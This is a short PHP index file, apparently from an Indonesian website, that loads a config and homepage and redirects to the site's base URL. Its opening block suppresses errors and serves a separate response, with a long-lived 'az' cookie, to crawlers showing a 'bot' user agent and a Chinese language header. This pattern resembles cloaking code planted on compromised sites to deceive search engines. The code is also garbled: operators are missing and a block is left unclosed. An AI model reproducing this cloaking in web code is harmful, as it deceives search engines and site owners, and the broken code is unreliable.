
<?php
error_reporting(0);
$s_ref = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];

if (strpos($agent, 'bot') > 0 && $_SERVER['REQUEST_URI'] == '/') {   
    $accept_lang = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']);
    if (strpos($accept_lang, 'zh') > -1  $_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS'] == 1  $_COOKIE['az'] == 'lp') {
        setcookie('az', 'lp', time() + 3600 * 7200);
        echo ' '; exit;
    }
    include "adminweb/homepage.php";
  include "config/koneksi.php";
  //include "rss.php";
  header('location:'.$base_url);
  //$w=mysql_fetch_array(mysql_query("select alamat_website from identitas"));
  
?>
